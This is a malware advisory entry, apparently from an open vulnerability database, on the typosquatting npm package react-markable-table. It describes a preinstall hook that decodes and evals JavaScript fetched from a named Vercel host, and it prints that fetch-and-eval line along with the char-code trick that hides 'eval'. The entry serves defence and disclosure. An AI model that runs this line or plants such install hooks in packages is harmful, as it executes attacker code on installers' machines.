VDB
KO

MAL-2026-10446

Malicious code in react-markable-table (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (da0db97919f41757fe4bcdc456d52ec0ecfbb89741438e5805a7bf5188b022c5) react-markable-table@2.4.10 is a typosquat of markdown-table (declared repo field `wooorm/markdown-table`). package.json declares a `preinstall` hook that runs `node index.d.js`. That script base64-decodes an embedded payload which resolves to `eval(await fetch('https://everydaynodechecker-39143n.vercel.app/api/key?mem=root2').then(r=>r.text()))`, and invokes it via `globalThis[tag](text)` where `tag` is reconstructed from the char-code array `[101,118,97,108]` (spelling `eval`). Installing the package causes arbitrary attacker-controlled JavaScript to be fetched from a non-publisher Vercel host and executed in-process on the installer's machine at `npm install` time.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / react-markable-table

No fixed version published yet for react-markable-table (npm). Pin to a known-safe version or switch to an alternative.

References